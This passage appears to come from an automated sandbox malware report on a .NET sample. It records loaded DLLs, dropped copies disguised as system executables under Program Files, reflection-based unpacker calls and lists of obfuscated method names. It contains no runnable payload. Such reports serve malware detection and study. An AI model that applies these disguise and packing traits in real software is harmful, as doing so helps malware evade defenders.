            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382Jump to behavior
            Source: XPC5PMKegV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: XPC5PMKegV.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: XPC5PMKegV.exeStatic file information: File size 1253376 > 1048576
            Source: XPC5PMKegV.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12e600
            Source: XPC5PMKegV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs.Net Code: doBJWyeqP0 System.AppDomain.Load(byte[])
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs.Net Code: doBJWyeqP0 System.Reflection.Assembly.Load(byte[])
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs.Net Code: doBJWyeqP0
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AA810 push edi; retf 32_2_00007FFD347AA816
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD347A5A95 push ds; retf 5F4Bh41_2_00007FFD347A5B0F
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD347A0F23 push E8FFFFFFh; ret 41_2_00007FFD347A0F39
            Source: XPC5PMKegV.exeStatic PE information: section name: .text entropy: 6.988119508345658
            Source: StartMenuExperienceHost.exe.0.drStatic PE information: section name: .text entropy: 6.988119508345658
            Source: System.exe.0.drStatic PE information: section name: .text entropy: 6.988119508345658
            Source: xMLVfJVxhYAkoCJ.exe.0.drStatic PE information: section name: .text entropy: 6.988119508345658
            Source: xMLVfJVxhYAkoCJ.exe0.0.drStatic PE information: section name: .text entropy: 6.988119508345658
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.csHigh entropy of concatenated method names: 'klPJp1BaY5', 'CZFJBNPgPU', 'EJBJftJk9w', 'QEnJ0KRi2o', 'LRVJx9HvB1', 'vThJ9UK1wh', 'AbxJgUM47C', 'v44AFeEX0F7tWDyneIC', 'uqR6aPEfAD41E6y0K45', 'YMHYW6EbKpbZY3AjyRM'
            Source: XPC5PMKegV.exe, U1SlpSrMrLSqCCuHBJh.csHigh entropy of concatenated method names: 'XctXUXp35J', 'nmoX7hCxwS', 'oyEXzdbtXU', 'qZWStiOwHs', 'r0ISwq08ct', 'H2ASc7r5KP', 'BPtSJ5kBU3', 'di8SX0vxmv', 'pGhSSMoYuN', 'tFM9iJVqv7GEOZ30Tp4'
            Source: XPC5PMKegV.exe, XsCsYiajpINURvkh10.csHigh entropy of concatenated method names: 'roP8Tq2MV', 'rf7oAjZMFgjiv6chtv', 'tpMo8fSj49jeQuX2mQ', 'cMxE2UFYnLwGS9m16n', 'FBYolDC5HhJH2Pyau5', 'GyD3HtDyYCfSYVXofL', 'mecciBLse', 'uNmJGGSxB', 'GokX6VN1h', 'nZGSQiokg'
            Source: XPC5PMKegV.exe, gP66Xyrlu7B2MJrjUgL.csHigh entropy of concatenated method names: 'BIvr3c1Buq', 'LIsQBvI6JJivDA5dKX3', 'TVNpQRITu3mM81OMVMY', 'gdhkJ2IN8t4dQK9a4bv', 'xGGcglIiQiT1nv2dTur', 'Rw6TbwIywd2wDrPI01H', 'Ay6rT4Mldy', 'X8trVKiFXj', 'zx1rn3Fh5Q', 'hGdrMIIUgq'
            Source: XPC5PMKegV.exe, f0g1VaXtropEBiD1PE.csHigh entropy of concatenated method names: 'a2n', '_7WJ', 'Xk2', 'B28', 'pMNKE04lSllj0cb3LE6', 'FJIZdA4mBpq5uqfa4xy', 'CvkEE44YTxnLMjxWWk4', 'WR4Vo44K8QF3W1uDemc', 'bbWhDM49wOYQ5fHBdUj', 'Aoq6e34akGy4VFnRSAl'
            Source: XPC5PMKegV.exe, dURg8F6dkDPGvbBqMne.csHigh entropy of concatenated method names: '_13J', '_7WJ', 'G8c', 'B28', 'TYxSyIJZeaSG0l1U9BV', 'TjTkaDJC9V8Xjomok6m', 'KEjmCdJDFJipGoQA0lW', 'XHPUqjJs7Jm1yotqsdl', 'X8Tq2ZJ18L0T5YOHtvh', 'gTAMUxJQloIms1PAsEq'
            Source: XPC5PMKegV.exe, kSNeX2rcW1LrxBgpvHe.csHigh entropy of concatenated method names: 'vZqJ67sVTM', 'rZ6LdwP3btvb6XrdKrv', 'OfgBm3PR0CPtE8RF1T6', 'lO3yOuPBn9Zge7NAceb', 'tIbXgmPrKu5GMVKM8jX', 'oVUWqGPHff7rOg5clLU', 'BsEVSCPJegpKurZphR9', 'riJrqRP7HO7QGBtjirw', 'UImteqPx1iplffLstZP', 'D1MOoaPE6fG9t7NbsAI'
            Source: XPC5PMKegV.exe, qOmHthTWMfS31ZWNfw6.csHigh entropy of concatenated method names: 'z2SyC7pV97', 'M0jyib5UIb', 'z1qyOjvLRc', 'YaNG5QLWBfD9TQqAFoj', 'SiOaDkL9XVJJuNaZyLy', 'kVhIkjLa3CWtsxbxKoJ', 'OZnsgfLgsNK0tmUZS6V', 'q64ysHxowt', 'nAGyrgRZkV', 'ThLy4vUPwS'
            Source: XPC5PMKegV.exe, jmryIT6LRxfHDNEwtNE.csHigh entropy of concatenated method names: 'tvS', '_7WJ', '_769', 'B28', 'pc0199BKiUgcuWumW7c', 'mmQb4HB9dYFPlEsoG7x', 'YDmRDGBatuhOMkMYiEg', 'f7PR39BWwLlsJ4VIH2q', 'CDutHNBg86hnPNjjqJG', 'KGIko3BOPaIvOsK8NAG'
            Source: XPC5PMKegV.exe, aigRxK66o2JkKkQOuwS.csHigh entropy of concatenated method names: 'sf4', '_7WJ', 'xcX', 'B28', 'tRXIK1BAIJn8xTAU9YT', 'Jm6st9BMOZdiu8Dy66a', 'RAKxlYBL4DtHvAc6ED5', 'JeWoqkB0Si98xPwNUlG', 'mLroZEBuNggTINnXHOw', 'KMRampBjl8Moq3nINlP'
            Source: XPC5PMKegV.exe, SvVP5Xr1bb6rw0sEojD.csHigh entropy of concatenated method names: 'IpuSaU4S4g', 'sGnYHYeG8YfUI3pMtDc', 'giA0uVe4WT0Ju2BOFj5', 'JRUCL4ek2rUAl0ygbdo', 'XATN3Xe83CrQlhJOPf0', 'tMlHSje2ZR0vhUyaoXE', 'IXtFQveByFJSAWks1h6', 'sYN5UQer4lBcbkWFjVI', 'YAJjHie3H8BtubKTmqG', 'YANYA3eRmanCphdXvJB'
            Source: XPC5PMKegV.exe, GwZmroUmdl1FnlK3Hqj.csHigh entropy of concatenated method names: 'aeEamdfJK6', 'W4y', '_854', 'lF2', 'g2EakN9upP', 'e61', 'h28aY6idsS', 'ocma3x57Pk', 'ft5', 'mtWaZMgQpA'
            Source: XPC5PMKegV.exe, VsuGNOpVOaCgmZPSxI3.csHigh entropy of concatenated method names: 'fRv10nguhH', 'Tf11xixl6H', 'Js319AoKA1', 'ELy1gwPOih', 'YBg1qZM7HU', 'UVo2kRo4r26G4chvEAr', 'prsyAIo26DsR1We3Opl', 'x9S7LXo8DjScmP5OYEv', 'APBdQWoGVdw4q4KHOmS', 'PSloIloBusRB8DxOT9n'
            Source: XPC5PMKegV.exe, uVWQMdTDao62x74yYIh.csHigh entropy of concatenated method names: '_9Yl', 'yN7bx0Ga9p', 'l0xyUKMQio', 'dlibcFtNPA', 'dx8v6C0TvNP28T2m4cm', 'PiZBGp0NxdcVJJ1nbRg', 'JEJ1ny06nLbYxGY2o71', 'IimqVu0ODhxC6owWu8m', 'NiE9PX0UxdNFlKbfSrT', 'm4yrGc0iVWh2XwxbI2f'
            Source: XPC5PMKegV.exe, kVspcdp0Ws1AhcBomLC.csHigh entropy of concatenated method names: 'Y54', 'Lc3', '_3f3', 'pt9', 'nBO', '_74N', '_777', 'oG5', 'Ry1', '_3bJ'
            Source: XPC5PMKegV.exe, f4F69MHjfSPQjQKxqv.csHigh entropy of concatenated method names: 'j37', '_7WJ', 'm1w', 'B28', 'Rw0q7d2nw', 'dGeZfH8wSjPgHbPq0kq', 'SfI0B28AVJhTq5q1sby', 'vOFt7a8MXkiBcghUJck', 'IdTh7a8LgAlRR6AFXgZ', 'hVgT9l80WrosyThYnH8'
            Source: XPC5PMKegV.exe, vdX68oG6iUH6GgQPnR.csHigh entropy of concatenated method names: 'V3p', '_7WJ', 'YGt', 'B28', 'kLUvKZ8JwQV1eH1tQW8', 'p3CHGQ8792CUFLS8Q1F', 'x8jZrD8x7aN2rSForFx', 'ORPIhg8EvXjVy3jLy7R', 'vm0Jb88PdjfNivS9YFf', 'tn2v9g8pSuG6WHmBBqH'
            Source: XPC5PMKegV.exe, dAL6YO6v32wJSdICWdx.csHigh entropy of concatenated method names: 'p1JwNpaPVb', 'lXIuJDHGcWo7NySMISN', 'aRDZoEH49wijEo2co1m', 'igvmcrHksyVvSbKZYBV', 'OhShY5H85BbHQQvUoTS', 'YNWu2GH2Gd2axafyOeR', 'B8ydEvHBtQruZqlGhQv', 'R9F1KDHr3HFHjvSDqUP', 'FD7wos5enB', 'cWHvxCHHahhf9H9Cere'
            Source: XPC5PMKegV.exe, OlwfVgUoUd7sNOSQ8ec.csHigh entropy of concatenated method names: 'kuQDiklHcKuk6JlXpwp', 'upoqHklJRfRtN0Lh83I', 'T9TUKGl3mWBemSliOMa', 'ohSFnPlRv5DKlrqUEUC', 'M4rdfLB1bk', '_71i', '_951', 'PHEd0gZarL', 'cEfdxjX4Ok', 'cPWd91nno1'
            Source: XPC5PMKegV.exe, jdiRBg61JN4QAi2oOJT.csHigh entropy of concatenated method names: 'BQbwHsVpC7', 'uhXOFPHnkrQMt7gagwE', 'hYvC6pHoIbiR87a3F2h', 't47FiaHuHDKZmA3VPDC', 'WmP6H7HjWSMY6TbiPHp', 'bh7yIMHfyukRbwZLdc4', 'amy', '_7WJ', '_3TA', 'B28'
            Source: XPC5PMKegV.exe, HDV9hypI26pClCBBdee.csHigh entropy of concatenated method names: '_364', 'kDNIVjC5xC', 'xinIn2AXNA', 'K7aIM0Rbfg', 'J98IQytiSi', 'W9vImP80qG', 'AdKIk5hPt6', 'PiGtALobq0dvHVD8as1', 'PgcWJJoXggB2rxB9bGo', 'DanMiDooZC0Unv8MQWo'
            Source: XPC5PMKegV.exe, ye8aWNTqk0b1FcRsZ1n.csHigh entropy of concatenated method names: 'A9l', 'vy1bG0DnFZ', 'yyivtghAKC', 'DWpbQuFbhC', 'RyYY6Ku8NCPtkYbAvmH', 'axCvGHuG4qXCIsgnguk', 'gFjwm8u47vblwAkxMof', 'rWa1S4uqRiexWPDPI25', 'GLTOr6ukh6jJ3WuQlqH', 'aNJrrXu2cr4QnJ7w5FI'
            Source: XPC5PMKegV.exe, SLLPugr8pKR7lGVhAUp.csHigh entropy of concatenated method names: 'tFrc3efu53', 'T2GcZNSKXO', 'EmwcdvUmgw', 'g0mjMd7CoepsiBRyno8', 'sq8K1S7DEiCClQg1Jbm', 't6eQ0v7sG60REJ7DPFr', 'UM8ciT71WuWmKUvtBWi', 'LEf1TO7Qb4e3akKgNPs', 'KqIOQZ7vPvc4IlUc372', 'zxjj2T7FViYGAFENepL'
            Source: XPC5PMKegV.exe, kIPDhH6Eh9gEOt304bk.csHigh entropy of concatenated method names: '_6L9', '_7WJ', '_5E1', 'B28', 'AipQ323zxfxQw3VOluy', 'S2c24QRqEiNwMv82IJV', 'pDgsYSRkFM59v8r3neG', 'yQScivR8AenBYc89moV', 'BnUvrTRGPLvMTTtpVj6', 'A2hxaZR4QAA6816v6Gl'
            Source: XPC5PMKegV.exe, THa8RgTPonEo7fqnLPu.csHigh entropy of concatenated method names: 'l8M4Bc8CyJ', 'xyC4foT82E', 'jrH400nmL6', 'iFhp3eMIPVJFWDpXelK', 'ildeboMV7Uty5DWycA9', 'hoY1T8MenxcDcGSWIHs', 'S8Sex3Mw4v0Ljc1Dbhe', 'zyK4CLLnJg', 'X0O4ijGFD4', 'D9g4OKHttg'
            Source: XPC5PMKegV.exe, X5lCJea0qEIjZsFB0lI.csHigh entropy of concatenated method names: 'm9NHuEddHds04', 'pTjZSQYAFE8CFm1b1yg', 'tBUsIcYMwHkVg4AvNMm', 'j6tpFuYLwNq4DKDed5Q', 'lRY6BaY07HbXC8NqQ4P', 'Ld96E0Yu8OlPS8NCqli', 'dZDymAYI6nWpvwoDHGf', 'zKR6TfYw6NvOZgilP4w', 'uKq2hYYj6fZLqOLMqWX', 'VFW9wOYnQm2xs01NY32'
            Source: XPC5PMKegV.exe, i1jdsTLl85OCES0PtGu.csHigh entropy of concatenated method names: 'Fev3j297h1', 'gQg3KLj2AW', 'OOt', '_8Md', 'qrX', '_1N5', 'x8o', 'xxn3aN1WdA', '_2m4', 'v4c'
            Source: XPC5PMKegV.exe, exil7e6cwtaPeLExwKG.csHigh entropy of concatenated method names: '_93E', '_7WJ', '_855', 'B28', 'N3hRDwrtPy6pDwmWKpZ', 'jeOidFrhPmLItC8Iw4r', 'Fb4UK1rdjSsd8rxIeZH', 'UDXObhrlZCrxZqKncC9', 'oIfdn6rmDThkhqKyXF4', 'ko0RQxrY1hMXxB5ZCEp'
            Source: XPC5PMKegV.exe, bprgVi6la5IXptQf6Vi.csHigh entropy of concatenated method names: 'gipcmjt3ae', 'ECncknawPg', 'fNccYlCyij', 'qpRETa77DrAgiN2vLdO', 'Xu4vHn7H4bwfGtv9OWc', 'KPANeI7JUUIpUAYjesb', 'Gtksgy7xpZFcBf6KNnw', 'wFgquW7ECMBNMaTr7CA', 'YVKXFJ7PGNoVlsSnKMt', 'cy7kF77pnQTylNUoyxi'
            Source: XPC5PMKegV.exe, T1JNqcgrHbtUAc4YqQ.csHigh entropy of concatenated method names: '_695', '_7WJ', '_472', 'B28', 'TylmMb2BDJXTi2EavI0', 'hOfoDE2rU9gtK6MQVlm', 'm7jPKs23xaTfvPpvhJ5', 'JKsrTT2RGwMjx12egdi', 'EFd59U2HEqBPHkyNMRY', 'AJIS4e2JmxAUfxUKFMN'
            Source: XPC5PMKegV.exe, K0nqIZTKp3pvByNf7CQ.csHigh entropy of concatenated method names: 'D1PPNEjlqlycPAjqwWa', 'n5jW07jm2cEuge2k8AD', 'vrFYLNjhxoTvYsDmeHF', 'L8gcEKjdxasgBRwXBrZ', '_26G', 'z33', 'kMxvO35rxg', 'w2qvbdRpy2', '_987', 'mc1vTw3t6o'
            Source: XPC5PMKegV.exe, HwlW5eThgMUHaYWFXQ4.csHigh entropy of concatenated method names: 'sqV4eH8ceg', 'Enb4uwF5gA', 'EWy4Eq0ond', 'gL2xJDMgLcHnnUNtljc', 'uj0ls5MOC8Q1kJqd3Yh', 'II3QAHMURmBu3lZx8Kl', 'dYMkADMTtZvAMAHSPfZ', 'Gso6kYMNHWu4tFmweGO', 'FVC6fSM67nq0pURI96J', 'KxjPQ5MiHhdMqljkhYf'
            Source: XPC5PMKegV.exe, onc0N3TSIib8Dtmf3H6.csHigh entropy of concatenated method names: '_7n5', 'iS6', 'IkmbuiFJVl', 'OSX', 'W2AbmLQE2v', 'oiV92muiGngTu8XqMgF', 'fmMF5OuyZf934NsHPg4', 'n406yOuzxePoglRtRNL', 'Iu5p1HjqUdoPoiHpRNN', 'BThaUtjkOvm5Q0fxp1N'
            Source: XPC5PMKegV.exe, bDZaFDUMwF69yLGvilu.csHigh entropy of concatenated method names: 'VE0dyygSkF', 'ra3dvNJRPk', 'p9vdD9AVY6', 'U1s', 'yYS', '_79P', '_5lh', 'j46', 'J63', 'Wned1CT082'
            Source: XPC5PMKegV.exe, RCS9MN6Fmifw4GBeIY9.csHigh entropy of concatenated method names: '_95T', '_7WJ', '_5Kd', 'B28', 'gDPYTm3kx2QAZBaGSMh', 'yDR0TB389H1MCb2QReq', 'IiZnGF3GXe8u7Qs90VK', 'r9OSnx34AhPRRhyDrC2', 'BwDI1q32QWciSXrKQCM', 'NVnykh3BvQi7M8sfijS'
            Source: XPC5PMKegV.exe, TbNhVJUyCnnERU7Xiib.csHigh entropy of concatenated method names: '_9Xh', 'pA2', '_5v5', '_4m5', '_1I6', 'ynJ', '_15m', 'V8n', '_753', 'c15'
            Source: XPC5PMKegV.exe, d8ilVI6iXvaEFUhlrfp.csHigh entropy of concatenated method names: '_4wN', '_7WJ', '_526', 'B28', 'Kba65O3sHSD5C0DJRC5', 'Ljrcbn31lV3gmw1eadW', 'KGuyX93Qsvin0MXYUhr', 'vIu5R43vIJlBdolfChD', 'TCMh4Q3thrsc1daKh0E', 'dvu0Nx3hq1DBosH5xmU'
            Source: XPC5PMKegV.exe, lSWdvHLBf90iO6VyMDw.csHigh entropy of concatenated method names: 't11Yny2aeA', 'w5AYMiuQnB', 'pulgNlsz2skhlekKUgD', 'S8QugC1qMpgXsWu79Z7', 'DHGTZm1k4aVAsa5O58J', 'pG7nUa18vWAnijp4M9e', 'wlJ0dG1G76po8SxH73L', 'qV0IVv14FULPs4C4sUP', 'zTfyjH12NJkJuv0YqT9', 'm3JDuZ1BpimW6ebFXPU'
            Source: XPC5PMKegV.exe, N7KIuaSn0C2OaIkIcD.csHigh entropy of concatenated method names: '_321', '_7WJ', '_726', 'B28', 'Vonuj52XxaCHybhuVFf', 'NmRmgZ259JVQKyMeYgm', 'Fi64wY2S2mbaQJT1hQm', 'haUREo2FE23epVxc4iI', 'gmAnXw2ZZguWay1j0vE', 'H4F0Ku2CS6h7qxjZ9lw'
            Source: XPC5PMKegV.exe, WRp7jS6yDNlWjHCys6b.csHigh entropy of concatenated method names: '_1I3', '_7WJ', 'Aa7', 'B28', 'rCvuAa391vspjZdigri', 'NIgQyA3a0ujlGFI1PSX', 'WiZpoE3W258LTEqxryb', 'Orpaad3gjM76gdZ9r7i', 'DT4icJ3ODWPZRBbTOb2', 'dyDkOJ3UiTp6oGUQs14'
            Source: XPC5PMKegV.exe, W2G0gDTF8W9Ih1wSuug.csHigh entropy of concatenated method names: 'lQt4249fxa', 'C9Z4HUBhwW', 'jC94FdJClF', 'KkF460Xfsc', 'SC34LugP6t', 'K4rXxILJx8owy9bJN90', 'QWSFWOL7w8XsqbQtmpv', 'SKcU6sLRn25UXF78vUx', 'i9cK7DLHjAUh6WbGMjT', 'tIob9JLxYlCMHju52nC'
            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.csHigh entropy of concatenated method names: 'LHWbEuYFS0GnZMKK5A6', 'WLtca6YZCSXDSOZ4xgY', 'A8MvTGY5brfY9ZmhA98', 'MRFWbiYSpXkpc3d2Jtl', 'blVRWeNs3I', 'M6NreiYsCpI1JoIQdXq', 'i6js3tY1pK5nHc7wYqG', 'FgV9TnYQZC2EHghHd8k', 'TyExi4YvewWsJciCr3u', 'F1X8NvYt0Jvm2fL4QjQ'
            Source: XPC5PMKegV.exe, tmoy8rLYPKw2P7OamUs.csHigh entropy of concatenated method names: 'x4nY2ulsWn', 'EJPYHgxGFF', 'YmlYFD43P6', 'QVMY6osbhu', 'naJYLwRD23', 'J57YUpZSCh', 'xYYtXT1TLP0QXpXqMaZ', 'nAXlcE1O5C4tsTRlHSo', 'QiDbYf1U6YqQqjQmCeO', 'trJTcl1NMV7F9l0lgd6'
            Source: XPC5PMKegV.exe, dEV9PYayGfcqGk0XZux.csHigh entropy of concatenated method names: 'PsvRYW42JN', 'GWfR3wV9iH', 'T1VRZCbOS5', 'NdPRdNbYaB', 'DrvRjOO1LX', 'NkJRKyZU5h', 'DQaRanoBam', 'EaARPgdZsE', 'oHsRRlYAZ0', 'wkHRpbeWMY'
            Source: XPC5PMKegV.exe, Ra53WHDsyCfioLYDgw.csHigh entropy of concatenated method names: 'iW5', '_7WJ', '_5CE', 'B28', 'pFo6kP4J05waL3egWJT', 'whGZ6h47Cn4j3ruujQX', 'bX6OYJ4xKki4dJec7WR', 'r9JI0C4EwvVYcSIWeWt', 'iWRKC14PsUcGRC79h82', 'mdp48d4pP1pwIDpmgkB'
            Source: XPC5PMKegV.exe, eCStXIr9xxQuvqyW8NK.csHigh entropy of concatenated method names: 'kKlJUbp9e9', 'yh5J7uajNb', 'E3AoHKPjfEFiUlCry5D', 'XSnTyGPnMmIKygQOHrp', 'MC2e8vPowwppQOGUn9M', 'Hsc74hPf5B9YGX5ol0h', 'gIFK81PbjbiE72M3OPY', 'ejTGbDPXujrcTqFOdwt', 'QOVJibP5iOWjS4FpGSs', 'CZ97C5PSXSOdSkcu1oI'
            Source: XPC5PMKegV.exe, TSdLTEpB6fHDtZFMVqW.csHigh entropy of concatenated method names: '_912', 'SuF', '_451', 'BdL', '_782', 'gY9', 'q92', 'ZYw', '_35s', 'I83'
            Source: XPC5PMKegV.exe, yEdGe8dL8ulrEXaocs.csHigh entropy of concatenated method names: 'P1z', '_7WJ', '_5Ch', 'B28', 'BSOkyt2pmH2RPf4DPIg', 'nxgyC32ckxWL14GBkKl', 'drjUwh2VxRosqaDAtcJ', 'pZ4txd2erD8Hw8ohD4E', 'TNVOn32IwCiBPRBuNup', 'oRvQ3c2wB0LPgkd14t9'
            Source: XPC5PMKegV.exe, dH1Xc1LAPMZxLIQlI8T.csHigh entropy of concatenated method names: 'uUe3XHOiPp', 'xT83SubndP', 'LVF3s2bPHl', 'UIP3rvPY6O', 'CvO34IKcwQ', 'VNg3yHY9ao', 'XwX3vNV6Kh', 'duN3DiNOqv', 'PL531DdWLn', 'Cdw3IWa8eG'
            Source: XPC5PMKegV.exe, UiVNbAql4hhBLby4Ts.csHigh entropy of concatenated method names: 'sd4', '_7WJ', '_2zX', 'B28', 'FLaN8V4elf42Cqd3Giv', 'SwgLIN4IjImTBBb6gbF', 'PmAb1A4wQexGGFXlcgV', 'b1Jkeb4ASGdHAsIK2nT', 'i4alUB4MfAoYXJNYAR3', 'dMJdBh4LAohvfT3DLps'
            Source: XPC5PMKegV.exe, pnNUTeTzesg7nAYyeVY.csHigh entropy of concatenated method names: 'HqQvjYvmer', 'pZ4vKJVBmF', 'uklvaAc2so', 'yM2jpUj9weBx8ZZsAGH', 'pUNj6ZjaVUFsiZ6RFEx', 'NwYuvhjYBku0E6rlDUQ', 'uF6x9FjK1v6rMxk28Mm', 'HichHNjWvRlGonadMua', 'aAiSshjg4xHlrmsOClH', 'obSs79jOTnEMStgj4mn'
            Source: XPC5PMKegV.exe, m7Yx3oK0kYe6AHj9lL.csHigh entropy of concatenated method names: '_1h5', '_7WJ', 'TyQ', 'B28', 'qxMtCD2YWgs78ciTnxx', 'zTWxvh2KnmqpQreLI7r', 'bFgLsH29HTwfUsYG70r', 'lLMyv12af0Po5dbauvt', 'E6Is5N2WkfQedYctsFG', 'RpV8n82gt7Y7DYDUQXe'
            Source: XPC5PMKegV.exe, vf2M6Sp9QJNAD4s7aUB.csHigh entropy of concatenated method names: 'eQRIXTH4je', 'qsJISsCagk', 'JV2IscFRu5', 'f7o4hDoLts6WfEVw4pm', 'Wbi45Wo0jdPE1ZiTWHx', 'q5HUV1oAq4AcQEghFyg', 'W5mUidoMjL58fcqjK1s', 'UpkXgmouoxwfY17aP4M', 'lFEib1ojAs29qMReFw6', 'XiLnq7onSg5fMyDf7rp'
            Source: XPC5PMKegV.exe, OP7JyVLE6htJ0UxVpp3.csHigh entropy of concatenated method names: 'BS0Ygy8Ahr', 'p2yYqv4Dka', 'UrDYGloXnF', 'agJYAdZnqY', 'WgcYlRjXEW', 'saweVn1Cwu6pjOypioE', 'XAjdvE1FG5534QjF0nD', 'OrGHNY1Zo1L9STDSiyG', 'Eci6O91DoF123v9mrHO', 'mWqGvC1sstHX8p2hKVt'
            Source: XPC5PMKegV.exe, zdFAVE6SWJ9Tbr5etQT.csHigh entropy of concatenated method names: '_3B5', '_7WJ', 'D4o', 'B28', 'rb5NH9JW10QNl6ADSGH', 'N4wOpJJgedqZYIyYwP9', 'fQAiXxJOdo1c7bsPPE5', 'TCkRrUJUxw5eqYfe7b5', 'oYWL1DJTeA4WqwOpFmc', 'tVODxBJNFT41op8ZgP2'
            Source: XPC5PMKegV.exe, yaLo7dN4I4Wc81sZuQ.csHigh entropy of concatenated method names: '_8k1', '_7WJ', 'B73', 'B28', 'LHkdh6GNxfoqbyefvW2', 'qQW5UaG6eLApA9If5tr', 'BMrqM0Gi1o3OOR8qlfG', 'YIC0VwGya8X4sHTYryM', 'Ua4XnyGzbRg6f3AFXuC', 'gj65ZU4qXuAAU4pkD8U'
            Source: XPC5PMKegV.exe, e3ydsorNghN6ua9ppro.csHigh entropy of concatenated method names: 'FnTs4JpgTt', 'aRcsy6C6TP', 'zdbQc1Iq6EeRdm0s34W', 'Mwho8yIkiymr0rF9Z5d', 'hWetuZeySmpgoL3rajP', 'nfHEIyezUlmjeBbFqsf', 'CQWsOie6wJ', 'gXowVlIBbVbj3x65rs8', 'p7SLeRIrkC1Q2T2BLcc', 'Fs808qI4srZ3VwtwWaS'
            Source: XPC5PMKegV.exe, lKCHso6XXYUPE6pcQcJ.csHigh entropy of concatenated method names: 'SRCcD92L0k', 'EAKc1aV6YW', 'y6RO9BJxbnj1kLoWwIg', 'WrhdYDJJjoP8ttZQqFn', 'cB7cLqJ7yOKqsB5p8d7', 'VCuG0oJEucdLP35hrJR', 'D1l6dPJPU6xu0LsQcAg', 'rfKRVYJpDZtsWvpWDkY', 'OkUZ6NJcoN862WEAWOC', 'W0PyRqJVuBOYEaxKyHx'
            Source: XPC5PMKegV.exe, Oi1qX5rn54HA5LWst2e.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'aWNSf1tEOP', 'uW8S0g6Emb', 'TWPSxS2vVS', 'TLRS9ZQDM9', 'TpXSgvWE8W', 'gcyi4DePjeDOtkpbmR0', 'Y7vFFxepKA2YtY8jT3b', 'p13IK4exPrKUVg0G6Re'
            Source: XPC5PMKegV.exe, XWgth7zAKmQlfDdxWZ.csHigh entropy of concatenated method names: '_4W2', '_7WJ', '_6R7', 'B28', 'sX1oH2B4M8qO1XKyhQ5', 'iXNPBmB2BMmuLSQpvMk', 'iADGb2BByqax1UMmDcD', 'JAwf81BrZN0FdyYuMel', 'v7eQPuB3awao9B2BSBI', 'Mhw5qYBRxhC3Fpe4Abb'
            Source: XPC5PMKegV.exe, c8ibLBUi5NXBa1AOvxw.csHigh entropy of concatenated method names: '_6u4', 'mQ9', 'b08ZYHKsW7', '_639', '_132', '_775', 'OOV', 'F1i', 'M4T', '_7dM'
            Source: XPC5PMKegV.exe, mTGbTepf5luI9wGdk1Y.csHigh entropy of concatenated method names: 'JwxIBb4Bch', 'C9tIfTdJ8s', 'uxZI0hFGl7', 'dZIIx5K6CO', 'XETI9lMoVl', 'Kw6LsiohtnEOZSoX3l4', 'd3bLhtodb2y3ujFkTe7', 'kj3s8yovfsnyQkR9LHu', 'YRIDA8otauK3DNmlPDJ', 'uBn61HolXxy2Vb4OVAd'
            Source: XPC5PMKegV.exe, v8bQYK6gGtbc7JJ4RgR.csHigh entropy of concatenated method names: 'J96', '_7WJ', '_95G', 'B28', 'L2yKhqJLWFbVqVrJnSs', 'voVIiZJ0H4FEyKVGK00', 'bXI8XuJuIOHOBIS5Ey7', 'PSxuVHJjKA2R0mmsqSK', 'eF0xXSJn3UESQPW5Zwr', 'FwsXnmJopM7SE9ASalR'
